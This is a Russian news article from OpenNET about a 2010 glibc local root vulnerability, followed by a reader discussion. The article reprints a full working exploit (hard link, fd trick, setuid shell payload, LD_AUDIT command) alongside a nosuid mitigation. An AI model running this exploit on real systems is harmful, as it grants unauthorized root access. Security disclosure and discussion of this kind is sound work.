The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

В Glibc обнаружена серьезная уязвимость

19.10.2010 14:47

В системной библиотеке GNU C Library (glibc), являющейся основой большинства Linux-дистрибутивов, обнаружена критическая уязвимость, позволяющая любому локальному пользователю получить привилегии суперпользователя. Проблема вызвана игнорированием в Glibc требования спецификации ELF по запрещению использования текущего пути к исполняемому файлу ($ORIGIN) в процессе динамического связывания программ с идентификатором смены владельца или группы (suid/sgid). Проблема проявляется в конфигурациях, в которых пользователь имеет возможность создавать жесткие ссылки в файловой системе, допускающей наличие suid-файлов.

Уязвимость протестирована в Fedora 13 и RHEL 5 / CentOS 5, другие дистрибутивы судя по всему также подвержены проблеме. Исправления пока недоступны, статус выхода обновлений в различных Linux-дистрибутивах можно наблюдать на следующих страницах: Slackware, Gentoo, Mandriva, openSUSE, CentOS, Fedora, RHEL, Debian, Ubuntu.

Проблема была известна и ранее, но разработчики Glibc считали, что эксплуатировать ее невозможно. Используя режим аудита связывания программ (LD_AUDIT) в ld.so, вкупе с подменой $ORIGIN через создание жесткой ссылки и запуском suid-программы через файловый дескриптор, удалось разработать практический метод атаки. Проверить свою систему на наличие уязвимости можно следующим способом:



Создаем произвольную директорию:

   $ mkdir /tmp/exploit

Привязываем suid-программу жесткой ссылкой в созданную директорию (при выполнении будет изменен $ORIGIN):

   $ ln /bin/ping /tmp/exploit/target

Открываем для исполняемого файла файловый дескриптор:

   $ exec 3< /tmp/exploit/target

Данный файловый дескриптор должен быть виден в пространстве /proc

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

Удаляем ранее созданную директорию

   $ rm -rf /tmp/exploit/

В /proc дескриптор остался, но теперь помечен как удаленный:

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

Заменяем директорию на специально созданный эксплоит (имя директории будет открыто через dlopen):

   $ cat > payload.c
   void __attribute__((constructor)) init()
   {
       setuid(0);
       system("/bin/bash");
   }
   ^D

   $ gcc -w -fPIC -shared -o /tmp/exploit payload.c
   $ ls -l /tmp/exploit
   -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

Инициируем динамическое связывание и загрузку $ORIGIN через LD_AUDIT и запуск программы по файловому дескриптору в /proc
   
   $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
   sh-4.1# whoami
   root
   sh-4.1# id
   uid=0(root) gid=500(taviso)

В качестве временной меры защиты рекомендуются перемонтировать все доступные сторонним пользователям на запись директории в режиме nosuid (актуально только если suid-файл и доступная на запись директория присутствуют в одном дисковом разделе, например, /tmp или /home являются частью корневого раздела, так как жесткая ссылка не может быть установлена из одного дискового раздела в другой) :


   # mount -o bind /tmp /tmp
   # mount -o remount,bind,nosuid /tmp /tmp

Дополнение: Разработчики из компании Red Hat выпустили патч, устраняющий проблему в Glibc.

  1. Главная ссылка к новости (http://seclists.org/fulldisclo...)
  2. OpenNews: Ошибка в библиотеке libc привела к уязвимости большинства FTP-серверов
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: glibc, security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (190) Ajax | 1 уровень | Линейный | Раскрыть всё | RSS
  • 1.1, KERNEL_PANIC (ok), 15:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    Оу, как страшно.
     
     
  • 2.7, follow_me (?), 15:37, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Покажи свой IP  и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;)
     
     
  • 3.10, arcade (ok), 15:40, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Покажи свой IP  и ты узнаешь как страшно , вернее ты
    > и не заметишь как всё закончится ;)

    Я не замечу. У меня фря и зфс, и такие глупости как один раздел под все файлы я давно изжил. А в разделах в которые пользователь умеет писать нет suid файлов.

    Хотя отношение разрабов не радует, давно такая бага в ядре и никто не зопатчил...

     
     
  • 4.13, User294 (ok), 15:48, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +16 +/
    > давно такая бага в ядре и никто не зопатчил...

    Epic, epic, epic fail!

    Hint #1: может быть, вам следует для начала научиться отличать ядро от glibc, а уже потом умничать начинать? :)
    Hint #2: в природе, кстати,  есть более чем одна реализация libc. И ряд линухов пользуется ими. Потому что ядро и либцэ - "немного" разные вещи.

     
  • 4.14, paxuser (?), 15:54, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • –10 +/
    Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD, то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и тем более от OpenBSD. Даже ванильный линукс дальше ушёл (но при этом качество кода ядра у него на уровне второй половины 90-ых - хуже, чем у любой из первой тройки *BSD).
     
     
  • 5.22, butcher (ok), 16:15, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD,
    > то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор
    > находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и
    > тем более от OpenBSD.

    Обоснуете? Или так, ваше личное мнение?

     
     
  • 6.33, paxuser (?), 16:40, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +6 +/
    >> Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD,
    >> то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор
    >> находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и
    >> тем более от OpenBSD.
    > Обоснуете? Или так, ваше личное мнение?

    Конечно обосную. Во FreeBSD не ни аналогов W^X, ни ASLR, ни PIE, даже возмоность сборки с SSP добавили лишь недавно. В том же CentOS всё это в той или иной мере есть (для юзерспейса). В ванильном линуксе уже реализован аналог W^X, ASLR, поддержка PIE и защита от маппинга памяти по нулевому адресу (с 2008 г.). Не говоря уже о PaX и Grsecurity, где на данный момент реализованы защиты ядра от классов уязвимостей для нескольких аппаратных архитектур, включая аналог W^X для юзерспецса (KERNEXEC), защиту от обращения по указателям на юзерспейс (UDEREF), проверки границ данных при копировании из юзерспейса в ядро (USERCOPY) и т.д.. С полным списком можете ознакомиться сами на grsecurity.net и pax.grsecurity.net + помощь в конфигураторе ядра с PaX и Grsecurity. Датировка первых реализаций PaX - 2001-2002 г. (точнее не вспомню), Grsecurity - 2003-ий год, начала аудита кода ядра и юзерспейса в OpenBSD - 96-ой год, начала включения ProPolice (SSP) - если не ошибаюсь, то 2001-ый год. В 2004-ом году (в сети есть слайды с презентации) в OpenBSD уже были W^X, аналог SSP, StackGhost (продвинутый аналог SSP для Sparc) и ASLR, в 2007-2008 г. была реализована поддержка PIE, в 2009-ом - запрет на памминг нулевого адреса. За NetBSD я не слежу, но пару-тройку лет назад они начали портировать что-то из PaX - гугль в помощь.

     
     
  • 7.100, BigHo (?), 23:07, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +4 +/
    W X - технология, основанная на Х-бит Если так, то она есть - ею можно пользов... текст свёрнут, показать
     
     
  • 8.104, PereresusNeVlezaetBuggy (ok), 00:06, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Не обязательно именно на аппаратный бит Суть именно в принципе 171 либо запис... текст свёрнут, показать
     
     
  • 9.111, BigHo (?), 01:03, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    В смысле тот, который nX AMD Xd INTEL Как его не назови, а суть одна Без его... текст свёрнут, показать
     
     
  • 10.112, PereresusNeVlezaetBuggy (ok), 01:42, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    gt оверквотинг удален Тут и возникает дилемма позволять использовать потенциа... текст свёрнут, показать
     
     
  • 11.118, paxuser (?), 02:19, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Вот только в PaX почему-то такой дилеммы не вознает Этот рейс кондишен связа... текст свёрнут, показать
     
  • 11.120, BigHo (?), 03:19, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Не в курсе был про такое поведение OpenBSD Видимо серьезный тон задает фон кате... текст свёрнут, показать
     
  • 10.114, paxuser (?), 02:06, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Существует как минимум две альтернативных, архитектурно-зависимых реализаций W X... текст свёрнут, показать
     
  • 9.159, User294 (ok), 17:21, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Аппаратная защита надежнее программной Одно дело если проц на уровне железа exc... текст свёрнут, показать
     
     
  • 10.161, PereresusNeVlezaetBuggy (ok), 17:38, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Вы бы хоть с предметом ознакомились сначала Ну хотя бы в Википедию заглянули, е... текст свёрнут, показать
     
     
  • 11.166, User294 (ok), 20:04, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    И правда, про возможность поюзать CS чтобы сделать изоляцию я все-таки пробаклан... текст свёрнут, показать
     
     
  • 12.169, PereresusNeVlezaetBuggy (ok), 21:08, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    В защищённом режиме 8212 да, CS и SS нельзя произвольно менять Думаю, в расс... текст свёрнут, показать
     
     
  • 13.170, paxuser (ok), 21:22, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Там в одних тестах на синтетике оверхед был до 36 В других хоть и тестировалис... текст свёрнут, показать
     
  • 10.163, paxuser (?), 17:41, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Зависит от того, что имеется ввиду под программной и под аппаратной защитой Сов... текст свёрнут, показать
     
     
  • 11.165, User294 (ok), 19:46, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Все бы ничего, но в таковых средах, типа Java NET PHP whatever почему-то на... текст свёрнут, показать
     
     
  • 12.168, paxuser (ok), 20:44, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Java NET PHP - это разве маргинальные языки платформы Это угодные индустрии ко... текст свёрнут, показать
     
  • 8.106, paxuser (?), 00:17, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Возможно, в последних версиях FreeBSD действительно появился аналог W X, но я об... текст свёрнут, показать
     
     
  • 9.119, BigHo (?), 02:35, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Про то и речь Только с уточнением результата - для AMD64 нормально работает В ... текст свёрнут, показать
     
     
  • 10.121, paxuser (?), 03:58, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +2 +/
    gt оверквотинг удален Да нет там никаких принципиальных различий, разница по с... текст свёрнут, показать
     
     
  • 11.122, paxuser (?), 04:00, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    s Реализация UDEREF вкратце описана Реализация UDEREF для amd64 вкратце описана ... текст свёрнут, показать
     
  • 11.123, paxuser (?), 04:19, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Более внятное описание USERCOPY из хелпа к конфигу By saying Y here the kernel ... текст свёрнут, показать
     
  • 11.196, taaroa (ok), 13:14, 24/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Позвольте Вас дополнить и поправить Slo-Tech Could you please describe in few ... текст свёрнут, показать
     
     
  • 12.197, paxuser (ok), 22:19, 24/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Не совсем так Из интервью с самим pipacs I talked to a few friends about it a... текст свёрнут, показать
     
  • 8.107, paxuser (?), 00:22, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Сейчас - Hardened Gentoo и CentOS, очень редко другие дистрибутивы Раньше - Fre... текст свёрнут, показать
     
     
  • 9.167, User294 (ok), 20:30, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ух ты, кажется я впервые в жизни вижу вменяемого пользователя Генту, способного ... текст свёрнут, показать
     
  • 5.23, mma (?), 16:16, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Что-то вы тут фантазируете. ни по одному из пунктов не согласен.
    1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в основном как пакетогонялка, как дескто или интерактивные сервися ее мало
    2)каковы критерии оценки качества кода ядер?
     
     
  • 6.37, paxuser (?), 16:46, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Что-то вы тут фантазируете. ни по одному из пунктов не согласен.
    > 1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в
    > основном как пакетогонялка, как дескто или интерактивные сервися ее мало

    Она не только локальным подвержена - пользовательские процессы наиболее подвержены удалённым атакам. О пакетогонялках расскажите, например, Сысоеву, и давайте будем рассматривать универсальное применение, а не частные случаи.

    > 2)каковы критерии оценки качества кода ядер?

    Субъективно-эмпирические, с оглядкой на сложность кода с опубликованными уязвимостями (на сколько просто/сложно было не допустить ошибку, приведшую к уязвимости).

     
     
  • 7.39, тигар (ok), 16:54, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> Что-то вы тут фантазируете. ни по одному из пунктов не согласен.
    >> 1)Да фряха значительно более подвержена локальным уязмимосятм но и и спользуется в
    >> основном как пакетогонялка, как дескто или интерактивные сервися ее мало
    > Она не только локальным подвержена - пользовательские процессы наиболее подвержены удалённым
    > атакам. О пакетогонялках расскажите, например, Сысоеву, и давайте будем рассматривать
    > универсальное применение, а не частные случаи.

    всеже хотелось бы увидеть пример при помощи которого я удаленно подниму свои привилегии до супер-пользователя, об этом же речь, да?

     
     
  • 8.41, paxuser (?), 16:59, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Нет, не об этом речь Но если взломщик заполучил права обычного пользователя и з... текст свёрнут, показать
     
     
  • 9.43, тигар (ok), 17:02, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    дак а fbsd причем или в линаксах еще где-то между вышеописанными шагами чтение... текст свёрнут, показать
     
     
  • 10.45, paxuser (?), 17:12, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    В линуксе реализованы механизмы, затрудняющие и или предотвращающие экслпуатацию... текст свёрнут, показать
     
     
  • 11.46, paxuser (?), 17:18, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Для ясности безопасность ванильного линукса лично я оцениваю очень низко там п... текст свёрнут, показать
     
  • 11.48, тигар (ok), 17:20, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    я пытаюсь понять зачем Вы пишете наборы фраз то PaX и Grsecurity то Она не то... текст свёрнут, показать
     
     
  • 12.53, paxuser (?), 17:26, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, вы просто хамите и либо не желаете понять, либо не обладаете даже базовым п... текст свёрнут, показать
     
     
  • 13.58, тигар (ok), 17:45, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    знаете меня больше практика интересует Есть примеры Где посмотреть статисти... текст свёрнут, показать
     
     
  • 14.73, paxuser (?), 19:07, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Вас не практика интересует, а некие примеры и статистика, которые в реальном мир... текст свёрнут, показать
     
     
  • 15.87, Добрый Аноним (?), 21:25, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Все так и имеет место быть, и тем ни менее, в линухах рута получают чаще, чем во... текст свёрнут, показать
     
     
  • 16.95, paxuser (?), 22:30, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Чаще или нет - меня, например, вообще не интересует Меня интересует, есть ли сп... текст свёрнут, показать
     
     
  • 17.130, Добрый Аноним (?), 11:41, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, когда куча детей сует свой код в ядро, действительно защищаться нужно, пр... текст свёрнут, показать
     
  • 16.98, User294 (ok), 22:43, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Еще один горе-аналитик Как обычно - с ТУПЫМИ ошибками Позор Интересно, а горе... текст свёрнут, показать
     
     
  • 17.102, paxuser (?), 23:15, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    На этот счёт есть разные мнения http archives neohapsis com archives dailydav... текст свёрнут, показать
     
  • 17.131, Добрый Аноним (?), 11:46, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    юзер обиделся забавно можно, с этим кто-то спорит В линуксе, сейчас, дыры н... текст свёрнут, показать
     
     
  • 18.141, paxuser (?), 14:28, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Только в отличие от винды, у линукса уже есть стабильная, проверенная временем р... текст свёрнут, показать
     
     
  • 19.147, Добрый Аноним (?), 14:41, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Вы же в курсе, что в винде тоже постоянно изобретают ловушки для своего кода , ... текст свёрнут, показать
     
     
  • 20.155, paxuser (?), 16:44, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Да, и я даже в курсе, у кого они списывают свои ловушки , а также почему у них ... текст свёрнут, показать
     
  • 21.160, Добрый Аноним (?), 17:25, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Хе, а вы мне уже начинаете нравиться ... текст свёрнут, показать
     
  • 18.149, User294 (ok), 15:41, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Обиделся На кого Я всего лишь не понимаю зачем надо выступать с горе-аналитик... текст свёрнут, показать
     
     
  • 19.152, Добрый Аноним (?), 16:36, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Был бы я не добрый сегодня, я бы поругался конечно , но коли я уж добрый, опущ... текст свёрнут, показать
     
  • 19.157, paxuser (?), 17:15, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Я немного вмешаюсь, простите Спам чаще валится с десктопов, потому что их гораз... текст свёрнут, показать
     
     
  • 20.158, paxuser (?), 17:21, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    s их гораздо меньше их гораздо больше ... текст свёрнут, показать
     
  • 21.164, User294 (ok), 18:41, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    0xFF Зарегались бы вы, а Тогда вы смогли бы исправлять такое путем редакт... текст свёрнут, показать
     
  • 16.110, blah (?), 01:01, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    сразу видно высказывание человека, к-ый вообще не шарит в безопасности вам вы... текст свёрнут, показать
     
  • 15.92, тигар (ok), 22:12, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    погодите, если я понял правильно то Вы предлагаете мне самому доказать Ваши голо... текст свёрнут, показать
     
     
  • 16.101, paxuser (?), 23:08, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, вы поняли неправильно, вернее, вы занимаетесь казуистикой, наигранно делая ... текст свёрнут, показать
     
  • 13.62, Аноним (62), 18:20, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Вы сами то верите в то что понаписали И какие же это пользовательские процес... текст свёрнут, показать
     
     
  • 14.75, paxuser (?), 19:14, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Не верю, а знаю Любые, которые обрабатывают данные из внешних, потенциально опа... текст свёрнут, показать
     
  • 14.86, User294 (ok), 21:10, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Yet another EPIC FAIL ... текст свёрнут, показать
     
  • 13.125, kshetragia (ok), 08:10, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Приведите статистику по дырам для Linux и FreeBSD для начала Быть может все эти... текст свёрнут, показать
     
     
  • 14.142, paxuser (?), 14:34, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    На статистику по дырам ориентироваться бессмысленно, т к в первую очередь на ... текст свёрнут, показать
     
     
  • 15.180, kshetragia (ok), 04:28, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Я про это и говорю Зачем городить огород раньше времени, если по факту дыры л... текст свёрнут, показать
     
     
  • 16.181, kshetragia (ok), 04:32, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Я не специалист по безопасности, но kern securelevel 2, mount to read only -... текст свёрнут, показать
     
     
  • 17.183, paxuser (ok), 06:39, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Озвучьте предложение на Full-Disclosure или DailyDave, оговорите достойное возна... текст свёрнут, показать
     
  • 16.182, paxuser (ok), 06:31, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Вы говорите совершенно об обратном и вдобавок питаете иллюзии о чистоте кода, ко... текст свёрнут, показать
     
  • 5.30, User294 (ok), 16:37, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    А как оценивалось качество кода? По какой методике?
     
  • 5.129, QuAzI (ok), 11:17, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Почему к сожалению Что до FreeBSD, давеча писали про http www opennet ru o... текст свёрнут, показать
     
     
  • 6.140, paxuser (?), 14:24, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Потому что ядро и так дырявое дыркой больше, дыркой меньше Знаете, у меня... текст свёрнут, показать
     
     
  • 7.153, QuAzI (ok), 16:38, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Почему на второй машине не проявилась на дырявом же ProFTPd Извините, вы выше ... текст свёрнут, показать
     
     
  • 8.156, paxuser (?), 16:57, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А я откуда знаю Но уж точно не потому, что между креслом и монитором находитесь... текст свёрнут, показать
     
     
  • 9.171, QuAzI (ok), 23:00, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Неа, бессовестно хамите тут как раз Вы, но очень уж уверены что именно Вы самый ... текст свёрнут, показать
     
     
  • 10.172, PereresusNeVlezaetBuggy (ok), 23:51, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Как ламер позорный, позволю себе всё же заметить, что тов paxuser 8212 дейст... текст свёрнут, показать
     
     
  • 11.176, QuAzI (ok), 01:10, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Пардон Человек тут на пол темы расписал, как хорош PaX и патчи для linux на осн... текст свёрнут, показать
     
     
  • 12.178, paxuser (ok), 01:31, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Не пардон Вы до сих пор считаете, что я что-то расписывал в категориях хорошо-п... текст свёрнут, показать
     
     
  • 13.184, QuAzI (ok), 08:27, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    А ничего что Grsecurity основан на PaX Это всё равно что написать PaX вместе с... текст свёрнут, показать
     
     
  • 14.186, paxuser (ok), 09:14, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    зеваю Очередная несусветная глупость, уже даже почти немного смешная Логики п... текст свёрнут, показать
     
  • 10.173, paxuser (ok), 00:17, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Где конкретно я хамил Это ваши фантазии и трусливая попытка прировнять надуманн... текст свёрнут, показать
     
     
  • 11.174, QuAzI (ok), 00:45, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    А где конкретно я хамил, конкретно Вам до вашего треда о том что я хам У меня т... текст свёрнут, показать
     
     
  • 12.175, paxuser (ok), 01:06, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    вы выше _орали_ про аппаратную реализацию, а аналоги использовать уже другой ... текст свёрнут, показать
     
     
  • 13.177, QuAzI (ok), 01:27, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    _орали_ - а как ещё назвать тучу постов выше _давайте, расхвалите мне её тут_- ... текст свёрнут, показать
     
     
  • 14.179, paxuser (ok), 01:51, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Высказывал мнение, аргументы, контраргументы, давал пояснения, повторял для особ... текст свёрнут, показать
     
     
  • 15.185, QuAzI (ok), 08:30, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Не похоже, ой не похоже ... текст свёрнут, показать
     
     
  • 16.187, paxuser (ok), 09:14, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Ну вам виднее, конечно ... текст свёрнут, показать
     
     
  • 17.188, QuAzI (ok), 16:21, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Можно немножко откровения Почему у Вас PaX даже в никнейме ... текст свёрнут, показать
     
     
  • 18.189, paxuser (ok), 17:58, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Это скорее подпись, которая звучит проще, чем grsecuser или grsecurityuser, а су... текст свёрнут, показать
     
  • 3.19, Аноним (-), 16:08, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >позволяющая любому _локальному_ пользователю получить привилегии суперпользователя

    вот так

     
  • 3.51, ы (?), 17:25, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >Покажи свой IP  и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;)

    Сетка класса А: 127.0.0.0/8, выбери любой из 16'777'214 айпишников.

     
  • 3.81, Аноним2 (?), 19:41, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Твои пинги я действительно заметить не успею.
     

     ....нить свёрнута, показать (91)

  • 1.5, V (??), 15:33, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 266: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
    Connection to board-gw closed.

    не судьба..

     
     
  • 2.25, h4tr3d (ok), 16:24, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Аналогично, это в консольке, xterm просто закрылся. может shell тоже имеет значение?
     
     
  • 3.32, Rain (??), 16:40, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, перенаправь вывод ошибок в файл и увидишь то же самое
     
     
  • 4.151, User294 (ok), 15:49, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Нет, перенаправь вывод ошибок в файл и увидишь то же самое

    Можно просто шелл в шелле запустить. Когда чайлдовый шелл помрет, вы вывалитесь в парент, сообщение о том почему сдох чайлд ессно будет видно. ИМХО так проще - ошибка вываливается в том же месте, не надо ни в каких файлах копаться где-то сбоку.

     

  • 1.6, Аноним (-), 15:36, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    на шаге
    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    шелл упал
    дистр OpenSUSE 11.3
     
     
  • 2.83, killer1804 (??), 20:12, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    [user0@homelinux ~]$ uname -a
    Linux homelinux 2.6.35-ARCH ....
    шел упал. аналогично
     

  • 1.8, Egres (ok), 15:38, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    $ mkdir /tmp/exploit
    $ ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

    Ubuntu 10.10, /tmp не является отдельной fs

     
     
  • 2.49, tallman (?), 17:24, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    и в логе такая штука
    $ tail -1 /var/log/messages
    Oct 19 16:17:21 machine kernel: [226597.124722] non-accessible hardlink creation was attempted by: ln (fsuid 1000)

    Даже как-то скучно быть неподверженным..

     

  • 1.9, paxuser (?), 15:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Кстати, в Grsecurity по умолчанию включены запреты пользователям на создание хардлинков на чужие файлы.
     
  • 1.11, Аноним (-), 15:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Исправления нет - как так?!
     
     
  • 2.28, Andrey Mitrofanov (?), 16:36, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Заголовок, "обнаружена". Вопросы?
     

  • 1.12, bircoph (?), 15:46, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid файлы.
    Так что эксплойт не работает и я в безопасности )).
     
     
  • 2.15, paxuser (?), 15:57, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid
    > файлы.
    > Так что эксплойт не работает и я в безопасности )).

    У вас в Gentoo месяцами обновления безопасности не выпускаются - посмотрите хотя бы на даты в ChangeLog MySQL в основном дереве Portage. Уровень защищённости приемлемый только в полноценном Hardened.

     
     
  • 3.20, Аноним (-), 16:11, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +2 +/
    emerge --sync по чаще делай
     
     
  • 4.24, paxuser (?), 16:20, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > emerge --sync по чаще делай

    Между прочим, emerge --sync подвержен MitM-атакам. Давно перешёл на emerge-webrsync вкупе с webrsync-gpg FEATURE. Нахамить-то любой может, вы для начала попробуйте осилить анализ содержимого /usr/portage/dev-db/mysql/ChangeLog с датой публикации бюллитеней безопасности и выходом исправленных версий MySQL.

     
     
  • 5.136, anonymous (??), 13:40, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Паранойя головного мозга во все поля.
     
     
  • 6.143, paxuser (?), 14:36, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Паранойя головного мозга во все поля.

    Блажен, кто верует, знание же преумножает скорбь. :)

     
  • 3.34, bircoph (?), 16:43, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Я mysql не пользуюсь, так что меня это не волнует. GLSA по критическим уязвимостям быстро выходят.
     
     
